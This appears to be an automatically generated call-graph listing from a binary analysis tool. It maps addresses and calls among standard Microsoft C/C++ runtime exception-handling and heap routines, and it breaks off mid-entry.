7ff8b8053ddc 7379->7382 7383 7ff8b805212d 7382->7383 7384 7ff8b8053dfd 7382->7384 7384->7383 7385 7ff8b8053e32 7384->7385 7386 7ff8b80597dc __std_exception_copy 47 API calls 7384->7386 7388 7ff8b8058978 7385->7388 7386->7385 7389 7ff8b805a26c 7388->7389 7390 7ff8b805a2a2 7389->7390 7391 7ff8b805a271 HeapFree 7389->7391 7390->7383 7391->7390 7392 7ff8b805a28c GetLastError 7391->7392 7393 7ff8b805a299 Concurrency::details::SchedulerProxy::DeleteThis 7392->7393 7394 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7393->7394 7394->7390 7700 7ff8b8059b84 7701 7ff8b8059b89 7700->7701 7702 7ff8b8059b9e 7700->7702 7706 7ff8b8059ba4 7701->7706 7707 7ff8b8059be6 7706->7707 7708 7ff8b8059bee 7706->7708 7710 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7707->7710 7709 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7708->7709 7711 7ff8b8059bfb 7709->7711 7710->7708 7712 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7711->7712 7713 7ff8b8059c08 7712->7713 7714 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7713->7714 7715 7ff8b8059c15 7714->7715 7716 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7715->7716 7717 7ff8b8059c22 7716->7717 7718 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7717->7718 7719 7ff8b8059c2f 7718->7719 7720 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7719->7720 7721 7ff8b8059c3c 7720->7721 7722 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7721->7722 7723 7ff8b8059c49 7722->7723 7724 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7723->7724 7725 7ff8b8059c59 7724->7725 7726 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7725->7726 7727 7ff8b8059c69 7726->7727 7732 7ff8b8059a54 7727->7732 7746 7ff8b805a1fc EnterCriticalSection 7732->7746 7748 7ff8b805c784 7749 7ff8b805c790 7748->7749 7750 7ff8b805c7b7 7749->7750 7752 7ff8b805ebbc 7749->7752 7753 7ff8b805ebfc 7752->7753 7754 7ff8b805ebc1 7752->7754 7753->7749 7755 7ff8b805ebf4 7754->7755 7756 7ff8b805ebe2 DeleteCriticalSection 7754->7756 7757 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7755->7757 7756->7755 7756->7756 7757->7753 7758 7ff8b8061f84 7759 7ff8b8061f93 7758->7759 7761 7ff8b8061f9d 7758->7761 7762 7ff8b805a250 LeaveCriticalSection 7759->7762 7763 7ff8b8061b81 7764 7ff8b8054620 _CallSETranslator 58 API calls 7763->7764 7765 7ff8b8061b99 7764->7765 7766 7ff8b8054620 _CallSETranslator 58 API calls 7765->7766 7767 7ff8b8061bb4 7766->7767 7768 7ff8b8054620 _CallSETranslator 58 API calls 7767->7768 7769 7ff8b8061bc8 7768->7769 7770 7ff8b8054620 _CallSETranslator 58 API calls 7769->7770 7771 7ff8b8061bd1 7770->7771 7776 7ff8b80566d4 7771->7776 7774 7ff8b8054620 _CallSETranslator 58 API calls 7775 7ff8b8061c18 7774->7775 7781 7ff8b8056438 7776->7781 7779 7ff8b8054620 _CallSETranslator 58 API calls 7780 7ff8b8056710 7779->7780 7780->7774 7782 7ff8b8056467 __except_validate_context_record 7781->7782 7783 7ff8b8054620 _CallSETranslator 58 API calls 7782->7783 7784 7ff8b805646c 7783->7784 7785 7ff8b80564bc 7784->7785 7788 7ff8b80565d6 __GSHandlerCheck_EH 7784->7788 7798 7ff8b8056575 7784->7798 7787 7ff8b80565c3 7785->7787 7796 7ff8b8056517 __GSHandlerCheck_EH 7785->7796 7785->7798 7786 7ff8b805661b 7786->7798 7832 7ff8b8055574 7786->7832 7825 7ff8b80532b8 7787->7825 7788->7786 7788->7798 7829 7ff8b8053b14 7788->7829 7791 7ff8b80566c6 7794 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7791->7794 7793 7ff8b8056567 7799 7ff8b80570f8 7793->7799 7795 7ff8b80566cb 7794->7795 7796->7791 7796->7793 7798->7779 7888 7ff8b8053b00 7799->7888 7801 7ff8b8057143 __GSHandlerCheck_EH 7802 7ff8b805717b 7801->7802 7803 7ff8b8057164 7801->7803 7805 7ff8b8054620 _CallSETranslator 58 API calls 7802->7805 7804 7ff8b8054620 _CallSETranslator 58 API calls 7803->7804 7806 7ff8b8057169 7804->7806 7809 7ff8b8057180 7805->7809 7807 7ff8b80573f6 7806->7807 7808 7ff8b8057173 7806->7808 7812 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7807->7812 7811 7ff8b8054620 _CallSETranslator 58 API calls 7808->7811 7809->7808 7810 7ff8b8054620 _CallSETranslator 58 API calls 7809->7810 7813 7ff8b805718b 7810->7813 7823 7ff8b805719f __CxxCallCatchBlock __GSHandlerCheck_EH 7811->7823 7814 7ff8b80573fb 7812->7814 7815 7ff8b8054620 _CallSETranslator 58 API calls 7813->7815 7815->7808 7816 7ff8b80573b8 7817 7ff8b8054620 _CallSETranslator 58 API calls 7816->7817 7818 7ff8b80573bd 7817->7818 7819 7ff8b80573c8 7818->7819 7820 7ff8b8054620 _CallSETranslator 58 API calls 7818->7820 7821 7ff8b8052180 _log10_special 8 API calls 7819->7821 7820->7819 7822 7ff8b80573db 7821->7822 7822->7798 7823->7816 7891 7ff8b8053b28 7823->7891 7826 7ff8b80532ca 7825->7826 7827 7ff8b80570f8 __GSHandlerCheck_EH 58 API calls 7826->7827 7828 7ff8b80532e5 7827->7828 7828->7798 7830 7ff8b8054620 _CallSETranslator 58 API calls 7829->7830 7831 7ff8b8053b1d 7830->7831 7831->7786 7833 7ff8b80555d1 __GSHandlerCheck_EH 7832->7833 7834 7ff8b80555d9 7833->7834 7835 7ff8b80555f0 7833->7835 7836 7ff8b8054620 _CallSETranslator 58 API calls 7834->7836 7837 7ff8b8054620 _CallSETranslator 58 API calls 7835->7837 7844 7ff8b80555de 7836->7844 7838 7ff8b80555f5 7837->7838 7840 7ff8b8054620 _CallSETranslator 58 API calls 7838->7840 7838->7844 7839 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7841 7ff8b8055a6e 7839->7841 7842 7ff8b8055600 7840->7842 7843 7ff8b8054620 _CallSETranslator 58 API calls 7842->7843 7843->7844 7846 7ff8b8055724 __GSHandlerCheck_EH 7844->7846 7847 7ff8b8054620 _CallSETranslator 58 API calls 7844->7847 7871 7ff8b8055a68 7844->7871 7845 7ff8b80559bf 7848 7ff8b80559bd 7845->7848 7845->7871 7932 7ff8b8055c8c 7845->7932 7846->7845 7882 7ff8b8055760 __GSHandlerCheck_EH 7846->7882 7849 7ff8b8055690 7847->7849 7850 7ff8b8054620 _CallSETranslator 58 API calls 7848->7850 7853 7ff8b8055a07 7849->7853 7856 7ff8b8054620 _CallSETranslator 58 API calls 7849->7856 7851 7ff8b8055a00 7850->7851 7851->7853 7851->7871 7852 7ff8b80559a4 __GSHandlerCheck_EH 7852->7848 7860 7ff8b8055a50 7852->7860 7855 7ff8b8052180 _log10_special 8 API calls 7853->7855 7857 7ff8b8055a13 7855->7857 7858 7ff8b80556a0 7856->7858 7857->7798 7859 7ff8b8054620 _CallSETranslator 58 API calls 7858->7859 7861 7ff8b80556a9 7859->7861 7863 7ff8b8054620 _CallSETranslator 58 API calls 7860->7863 7894 7ff8b8053b40 7861->7894 7864 7ff8b8055a56 7863->7864 7866 7ff8b8054620 _CallSETranslator 58 API calls 7864->7866 7867 7ff8b8055a5f 7866->7867 7869 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 7867->7869 7868 7ff8b8054620 _CallSETranslator 58 API calls 7870 7ff8b80556e6 7868->7870 7869->7871 7870->7846 7872 7ff8b8054620 _CallSETranslator 58 API calls 7870->7872 7871->7839 7874 7ff8b80556f2 7872->7874 7873 7ff8b8053b14 58 API calls BuildCatchObjectHelperInternal 7873->7882 7875 7ff8b8054620 _CallSETranslator 58 API calls 7874->7875 7876 7ff8b80556fb 7875->7876 7897 7ff8b8057494 7876->7897 7880 7ff8b805570f 7906 7ff8b8057584 7880->7906 7882->7852 7882->7873 7910 7ff8b80560bc 7882->7910 7924 7ff8b8054fc8 7882->7924 7883 7ff8b8055a4a 7950 7ff8b8059758 7883->7950 7886 7ff8b8055717 __CxxCallCatchBlock std::bad_alloc::bad_alloc 7886->7883 7887 7ff8b8053e94 Concurrency::cancel_current_task 2 API calls 7886->7887 7887->7883 7889 7ff8b8054620 _CallSETranslator 58 API calls 7888->7889 7890 7ff8b8053b09 7889->7890 7890->7801 7892 7ff8b8054620 _CallSETranslator 58 API calls 7891->7892 7893 7ff8b8053b36 7892->7893 7893->7823 7895 7ff8b8054620 _CallSETranslator 58 API calls 7894->7895 7896 7ff8b8053b4e 7895->7896 7896->7868 7896->7871 7898 7ff8b805757b 7897->7898 7905 7ff8b80574bf 7897->7905 7900 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7898->7900 7899 7ff8b805570b 7899->7846 7899->7880 7901 7ff8b8057580 7900->7901 7902 7ff8b8053b14 58 API calls BuildCatchObjectHelperInternal 7902->7905 7903 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7903->7905 7905->7899 7905->7902 7905->7903 7955 7ff8b8055f7c 7905->7955 7907 7ff8b80575f1 7906->7907 7909 7ff8b80575a1 Is_bad_exception_allowed 7906->7909 7907->7886 7908 7ff8b8053b00 58 API calls BuildCatchObjectHelperInternal 7908->7909 7909->7907 7909->7908 7911 7ff8b80560e9 7910->7911 7922 7ff8b8056179 7910->7922 7912 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7911->7912 7913 7ff8b80560f2 7912->7913 7914 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7913->7914 7915 7ff8b805610b 7913->7915 7913->7922 7914->7915 7916 7ff8b8056138 7915->7916 7917 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7915->7917 7915->7922 7918 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 7916->7918 7917->7916 7919 7ff8b805614c 7918->7919 7920 7ff8b8056165 7919->7920 7921 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7919->7921 7919->7922 7923 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 7920->7923 7921->7920 7922->7882 7923->7922 7925 7ff8b8055005 __GSHandlerCheck_EH 7924->7925 7926 7ff8b805502b 7925->7926 7969 7ff8b8054e30 7925->7969 7928 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7926->7928 7929 7ff8b805503d 7928->7929 7978 7ff8b805378c RtlUnwindEx 7929->7978 7933 7ff8b8055f55 7932->7933 7934 7ff8b8055ce0 7932->7934 7935 7ff8b8052180 _log10_special 8 API calls 7933->7935 7936 7ff8b8054620 _CallSETranslator 58 API calls 7934->7936 7937 7ff8b8055f61 7935->7937 7938 7ff8b8055ce5 7936->7938 7937->7848 7939 7ff8b8055cfa EncodePointer 7938->7939 7940 7ff8b8055d4c __GSHandlerCheck_EH 7938->7940 7941 7ff8b8054620 _CallSETranslator 58 API calls 7939->7941 7940->7933 7942 7ff8b8055f75 7940->7942 7948 7ff8b8055d6e __GSHandlerCheck_EH 7940->7948 7945 7ff8b8055d0a 7941->7945 7943 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7942->7943 7944 7ff8b8055f7a 7943->7944 7945->7940 8057 7ff8b8053034 7945->8057 7947 7ff8b8054fc8 __GSHandlerCheck_EH 59 API calls 7947->7948 7948->7933 7948->7947 7949 7ff8b8053b00 58 API calls BuildCatchObjectHelperInternal 7948->7949 7949->7948 7951 7ff8b8059d48 BuildCatchObjectHelperInternal 47 API calls 7950->7951 7952 7ff8b8059761 7951->7952 7953 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7952->7953 7954 7ff8b8059781 7953->7954 7956 7ff8b8056038 7955->7956 7957 7ff8b8055fa9 7955->7957 7956->7905 7958 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7957->7958 7959 7ff8b8055fb2 7958->7959 7959->7956 7960 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7959->7960 7961 7ff8b8055fcb 7959->7961 7960->7961 7961->7956 7962 7ff8b8055ff7 7961->7962 7963 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7961->7963 7964 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 7962->7964 7963->7962 7965 7ff8b805600b 7964->7965 7965->7956 7966 7ff8b8056024 7965->7966 7967 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7965->7967 7968 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 7966->7968 7967->7966 7968->7956 7970 7ff8b8054e53 7969->7970 7981 7ff8b8054b6c 7970->7981 7972 7ff8b8054e64 7973 7ff8b8054ea5 __AdjustPointer 7972->7973 7976 7ff8b8054e69 __AdjustPointer 7972->7976 7974 7ff8b8054e88 __GSHandlerCheck_EH 7973->7974 7975 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 7973->7975 7974->7926 7975->7974 7976->7974 7977 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 7976->7977 7977->7974 7979 7ff8b8052180 _log10_special 8 API calls 7978->7979 7980 7ff8b80538a2 7979->7980 7980->7882 7982 7ff8b8054b99 7981->7982 7984 7ff8b8054ba2 7981->7984 7983 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7982->7983 7983->7984 7985 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 7984->7985 7986 7ff8b8054bc1 7984->7986 7993 7ff8b8054c26 __AdjustPointer BuildCatchObjectHelperInternal 7984->7993 7985->7986 7987 7ff8b8054c2e 7986->7987 7990 7ff8b8054c0e 7986->7990 7986->7993 7988 7ff8b8054c9f 7987->7988 7989 7ff8b8054c55 7987->7989 7987->7993 7991 7ff8b8054cae 7988->7991 7992 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 7988->7992 7989->7993 7994 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7989->7994 7990->7993 7997 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7990->7997 7995 7ff8b8054cbe 7991->7995 8002 7ff8b8054cf2 7991->8002 7992->7991 7993->7972 7994->7995 7995->7993 7996 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7995->7996 7998 7ff8b8054d06 7996->7998 7999 7ff8b8054d66 7997->7999 7998->7993 7998->7999 8000 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7998->8000 8001 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 7999->8001 8000->7999 8004 7ff8b8054d6c 8001->8004 8002->7998 8003 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8002->8003 8003->7998 8012 7ff8b805496c 8004->8012 8006 7ff8b8054da3 8007 7ff8b8054de4 __AdjustPointer 8006->8007 8008 7ff8b8054da8 __AdjustPointer 8006->8008 8009 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8007->8009 8011 7ff8b8054dc7 __GSHandlerCheck_EH 8007->8011 8010 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8008->8010 8008->8011 8009->8011 8010->8011 8011->7972 8013 7ff8b8054999 8012->8013 8015 7ff8b80549a2 8012->8015 8014 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8013->8014 8014->8015 8016 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8015->8016 8017 7ff8b80549c1 8015->8017 8025 7ff8b8054a24 __AdjustPointer BuildCatchObjectHelperInternal 8015->8025 8016->8017 8018 7ff8b8054a0c 8017->8018 8019 7ff8b8054a2c 8017->8019 8017->8025 8021 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8018->8021 8018->8025 8020 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8019->8020 8022 7ff8b8054aab 8019->8022 8019->8025 8020->8022 8023 7ff8b8054b63 8021->8023 8022->8025 8027 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8022->8027 8024 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8023->8024 8026 7ff8b8054b69 8024->8026 8025->8006 8028 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8026->8028 8029 7ff8b8054ba2 8026->8029 8027->8025 8028->8029 8030 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8029->8030 8031 7ff8b8054bc1 8029->8031 8048 7ff8b8054c26 __AdjustPointer BuildCatchObjectHelperInternal 8029->8048 8030->8031 8032 7ff8b8054c2e 8031->8032 8035 7ff8b8054c0e 8031->8035 8031->8048 8033 7ff8b8054c9f 8032->8033 8034 7ff8b8054c55 8032->8034 8032->8048 8036 7ff8b8054cae 8033->8036 8037 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8033->8037 8038 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8034->8038 8034->8048 8041 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8035->8041 8035->8048 8039 7ff8b8054cbe 8036->8039 8046 7ff8b8054cf2 8036->8046 8037->8036 8038->8039 8040 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8039->8040 8039->8048 8042 7ff8b8054d06 8040->8042 8043 7ff8b8054d66 8041->8043 8042->8043 8044 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8042->8044 8042->8048 8045 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8043->8045 8044->8043 8049 7ff8b8054d6c 8045->8049 8046->8042 8047 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8046->8047 8047->8042 8048->8006 8050 7ff8b805496c 58 API calls 8049->8050 8051 7ff8b8054da3 8050->8051 8052 7ff8b8054de4 __AdjustPointer 8051->8052 8053 7ff8b8054da8 __AdjustPointer 8051->8053 8054 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8052->8054 8056 7ff8b8054dc7 __GSHandlerCheck_EH 8052->8056 8055 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8053->8055 8053->8056 8054->8056 8055->8056 8056->8006 8058 7ff8b8054620 _CallSETranslator 58 API calls 8057->8058 8059 7ff8b8053060 8058->8059 8059->7940 8289 7ff8b8056200 8290 7ff8b805622d __except_validate_context_record 8289->8290 8291 7ff8b8054620 _CallSETranslator 58 API calls 8290->8291 8292 7ff8b8056232 8291->8292 8293 7ff8b805628c 8292->8293 8294 7ff8b805631a 8292->8294 8310 7ff8b80562e0 8292->8310 8295 7ff8b8056307 8293->8295 8298 7ff8b80562ae 8293->8298 8299 7ff8b80562e5 8293->8299 8293->8310 8300 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8294->8300 8301 7ff8b8056339 8294->8301 8336 7ff8b8053254 8295->8336 8312 7ff8b8054814 8298->8312 8299->8295 8302 7ff8b80562bd 8299->8302 8300->8301 8305 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8301->8305 8308 7ff8b8056388 8301->8308 8301->8310 8304 7ff8b8056431 8302->8304 8307 7ff8b80562cf 8302->8307 8306 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8304->8306 8305->8308 8309 7ff8b8056436 8306->8309 8317 7ff8b8056f6c 8307->8317 8308->8310 8345 7ff8b805509c 8308->8345 8313 7ff8b8054822 8312->8313 8314 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8313->8314 8316 7ff8b8054833 8313->8316 8315 7ff8b8054879 8314->8315 8316->8302 8318 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8317->8318 8319 7ff8b8056f9b 8318->8319 8407 7ff8b8054768 8319->8407 8322 7ff8b8054620 _CallSETranslator 58 API calls 8334 7ff8b8056fb8 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8322->8334 8323 7ff8b80570af 8324 7ff8b8054620 _CallSETranslator 58 API calls 8323->8324 8325 7ff8b80570b4 8324->8325 8329 7ff8b80570bf 8325->8329 8330 7ff8b8054620 _CallSETranslator 58 API calls 8325->8330 8326 7ff8b80570ea 8327 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8326->8327 8327->8329 8328 7ff8b80570cc __FrameHandler3::GetHandlerSearchState 8328->8310 8329->8328 8332 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8329->8332 8330->8329 8331 7ff8b8053b00 58 API calls BuildCatchObjectHelperInternal 8331->8334 8333 7ff8b80570f5 8332->8333 8334->8323 8334->8326 8334->8331 8335 7ff8b8053b28 __FrameHandler3::FrameUnwindToEmptyState 58 API calls 8334->8335 8335->8334 8411 7ff8b80532ec 8336->8411 8343 7ff8b8056f6c __FrameHandler3::FrameUnwindToEmptyState 58 API calls 8344 7ff8b80532a8 8343->8344 8344->8310 8425 7ff8b80573fc 8345->8425 8347 7ff8b805556a 8348 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8347->8348 8350 7ff8b8055570 8348->8350 8349 7ff8b80551e3 8351 7ff8b80554bb 8349->8351 8353 7ff8b805521b 8349->8353 8351->8347 8352 7ff8b80554b9 8351->8352 8460 7ff8b8055a70 8351->8460 8355 7ff8b8054620 _CallSETranslator 58 API calls 8352->8355 8356 7ff8b80553ec 8353->8356 8437 7ff8b80533dc 8353->8437 8359 7ff8b80554fd 8355->8359 8356->8352 8363 7ff8b8055409 8356->8363 8366 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8356->8366 8357 7ff8b8054620 _CallSETranslator 58 API calls 8361 7ff8b805514a 8357->8361 8359->8347 8362 7ff8b8055504 8359->8362 8361->8362 8367 7ff8b8054620 _CallSETranslator 58 API calls 8361->8367 8364 7ff8b8052180 _log10_special 8 API calls 8362->8364 8363->8352 8370 7ff8b805542b 8363->8370 8452 7ff8b8053220 8363->8452 8365 7ff8b8055510 8364->8365 8365->8310 8366->8363 8369 7ff8b805515a 8367->8369 8371 7ff8b8054620 _CallSETranslator 58 API calls 8369->8371 8370->8352 8372 7ff8b8055441 8370->8372 8403 7ff8b805554d 8370->8403 8373 7ff8b8055163 8371->8373 8374 7ff8b805544c 8372->8374 8377 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8372->8377 8376 7ff8b8053b40 __GSHandlerCheck_EH 58 API calls 8373->8376 8380 7ff8b8057494 __GSHandlerCheck_EH 58 API calls 8374->8380 8375 7ff8b8054620 _CallSETranslator 58 API calls 8378 7ff8b8055553 8375->8378 8379 7ff8b805517a 8376->8379 8377->8374 8381 7ff8b8054620 _CallSETranslator 58 API calls 8378->8381 8379->8347 8383 7ff8b8054620 _CallSETranslator 58 API calls 8379->8383 8382 7ff8b8055463 8380->8382 8384 7ff8b805555c 8381->8384 8382->8352 8387 7ff8b80532ec __FrameHandler3::GetHandlerSearchState 48 API calls 8382->8387 8386 7ff8b80551a5 8383->8386 8385 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 8384->8385 8385->8347 8386->8349 8390 7ff8b8054620 _CallSETranslator 58 API calls 8386->8390 8389 7ff8b805547d 8387->8389 8388 7ff8b8053b14 58 API calls BuildCatchObjectHelperInternal 8396 7ff8b805524a 8388->8396 8457 7ff8b8053688 RtlUnwindEx 8389->8457 8392 7ff8b80551b1 8390->8392 8394 7ff8b8054620 _CallSETranslator 58 API calls 8392->8394 8393 7ff8b8055f7c __GSHandlerCheck_EH 58 API calls 8393->8396 8395 7ff8b80551ba 8394->8395 8397 7ff8b8057494 __GSHandlerCheck_EH 58 API calls 8395->8397 8396->8356 8396->8388 8396->8393 8443 7ff8b8054ef4 8396->8443 8399 7ff8b80551ca 8397->8399 8399->8349 8400 7ff8b80551ce 8399->8400 8401 7ff8b8057584 Is_bad_exception_allowed 58 API calls 8400->8401 8404 7ff8b80551d6 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8401->8404 8402 7ff8b8059758 __GSHandlerCheck_EH 47 API calls 8402->8403 8403->8375 8405 7ff8b8053e94 Concurrency::cancel_current_task 2 API calls 8404->8405 8406 7ff8b8055547 8404->8406 8405->8406 8406->8402 8408 7ff8b805477f 8407->8408 8409 7ff8b805478a 8407->8409 8410 7ff8b8054814 __GetCurrentState 47 API calls 8408->8410 8409->8322 8410->8409 8412 7ff8b8054804 __FrameHandler3::GetHandlerSearchState 47 API calls 8411->8412 8413 7ff8b805331a 8412->8413 8414 7ff8b8053346 RtlLookupFunctionEntry 8413->8414 8415 7ff8b8053273 8413->8415 8414->8413 8416 7ff8b8054804 8415->8416 8417 7ff8b8054814 8416->8417 8418 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8417->8418 8420 7ff8b8053281 8417->8420 8419 7ff8b8054879 8418->8419 8421 7ff8b8053088 8420->8421 8424 7ff8b80530a6 8421->8424 8422 7ff8b80530d3 8422->8343 8423 7ff8b8054620 _CallSETranslator 58 API calls 8423->8424 8424->8422 8424->8423 8426 7ff8b8054804 __FrameHandler3::GetHandlerSearchState 47 API calls 8425->8426 8427 7ff8b8057421 8426->8427 8428 7ff8b80532ec __FrameHandler3::GetHandlerSearchState 48 API calls 8427->8428 8429 7ff8b8057436 8428->8429 8478 7ff8b8054790 8429->8478 8432 7ff8b8057448 __FrameHandler3::GetHandlerSearchState 8481 7ff8b80547c8 8432->8481 8433 7ff8b805746b 8434 7ff8b8054790 __GetUnwindTryBlock 48 API calls 8433->8434 8435 7ff8b80550fe 8434->8435 8435->8347 8435->8349 8435->8357 8438 7ff8b8054804 __FrameHandler3::GetHandlerSearchState 47 API calls 8437->8438 8439 7ff8b805341b 8438->8439 8440 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8439->8440 8442 7ff8b8053429 8439->8442 8441 7ff8b8053519 8440->8441 8442->8396 8444 7ff8b80532ec __FrameHandler3::GetHandlerSearchState 48 API calls 8443->8444 8445 7ff8b8054f31 8444->8445 8446 7ff8b8054f57 8445->8446 8484 7ff8b8054d70 8445->8484 8448 7ff8b8053b00 BuildCatchObjectHelperInternal 58 API calls 8446->8448 8449 7ff8b8054f69 8448->8449 8450 7ff8b8053688 9 API calls 8449->8450 8451 7ff8b8054fad 8450->8451 8451->8396 8453 7ff8b8054804 __FrameHandler3::GetHandlerSearchState 47 API calls 8452->8453 8454 7ff8b8053234 8453->8454 8455 7ff8b8053088 __FrameHandler3::ExecutionInCatch 58 API calls 8454->8455 8456 7ff8b805323e 8455->8456 8456->8370 8458 7ff8b8052180 _log10_special 8 API calls 8457->8458 8459 7ff8b8053782 8458->8459 8459->8352 8461 7ff8b8055b14 8460->8461 8462 7ff8b8055aa6 8460->8462 8461->8352 8463 7ff8b8054620 _CallSETranslator 58 API calls 8462->8463 8464 7ff8b8055aab 8463->8464 8465 7ff8b8055b10 8464->8465 8466 7ff8b8055aba EncodePointer 8464->8466 8465->8461 8468 7ff8b8055b49 8465->8468 8469 7ff8b8055c83 8465->8469 8467 7ff8b8054620 _CallSETranslator 58 API calls 8466->8467 8474 7ff8b8055aca 8467->8474 8471 7ff8b80533dc 47 API calls 8468->8471 8470 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8469->8470 8472 7ff8b8055c88 8470->8472 8473 7ff8b8055b66 8471->8473 8473->8461 8476 7ff8b8053b00 58 API calls BuildCatchObjectHelperInternal 8473->8476 8477 7ff8b8054ef4 60 API calls 8473->8477 8474->8465 8493 7ff8b8052fe0 8474->8493 8476->8473 8477->8473 8479 7ff8b80532ec __FrameHandler3::GetHandlerSearchState 48 API calls 8478->8479 8480 7ff8b80547a3 8479->8480 8480->8432 8480->8433 8482 7ff8b80532ec __FrameHandler3::GetHandlerSearchState 48 API calls 8481->8482 8483 7ff8b80547e2 8482->8483 8483->8435 8485 7ff8b8054d92 8484->8485 8486 7ff8b805496c 58 API calls 8485->8486 8487 7ff8b8054da3 8486->8487 8488 7ff8b8054de4 __AdjustPointer 8487->8488 8489 7ff8b8054da8 __AdjustPointer 8487->8489 8490 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8488->8490 8492 7ff8b8054dc7 __GSHandlerCheck_EH 8488->8492 8491 7ff8b8053b14 BuildCatchObjectHelperInternal 58 API calls 8489->8491 8489->8492 8490->8492 8491->8492 8492->8446 8494 7ff8b8054620 _CallSETranslator 58 API calls 8493->8494 8495 7ff8b805300c 8494->8495 8495->8465 8496 7ff8b8051000 8497 7ff8b8053ddc __std_exception_copy 49 API calls 8496->8497 8498 7ff8b8051029 8497->8498 8699 7ff8b8052a80 8700 7ff8b8052a8b 8699->8700 8701 7ff8b8054744 __vcrt_uninitialize_ptd 6 API calls 8700->8701 8702 7ff8b80541f9 8701->8702 8706 7ff8b805d080 8707 7ff8b805d08b 8706->8707 8715 7ff8b805fb88 8707->8715 8728 7ff8b805a1fc EnterCriticalSection 8715->8728 8499 7ff8b8052c28 8500 7ff8b8052c39 8499->8500 8501 7ff8b8052c49 8500->8501 8502 7ff8b80541d4 7 API calls 8500->8502 8502->8501 7395 7ff8b805c528 GetProcessHeap 8503 7ff8b8054e2a 8504 7ff8b8059784 BuildCatchObjectHelperInternal 47 API calls 8503->8504 8505 7ff8b8054e2f 8504->8505 8060 7ff8b805a1b4 8061 7ff8b805a1bc 8060->8061 8062 7ff8b805c304 6 API calls 8061->8062 8063 7ff8b805a1ed 8061->8063 8064 7ff8b805a1e9 8061->8064 8062->8061 8066 7ff8b805a218 8063->8066 8067 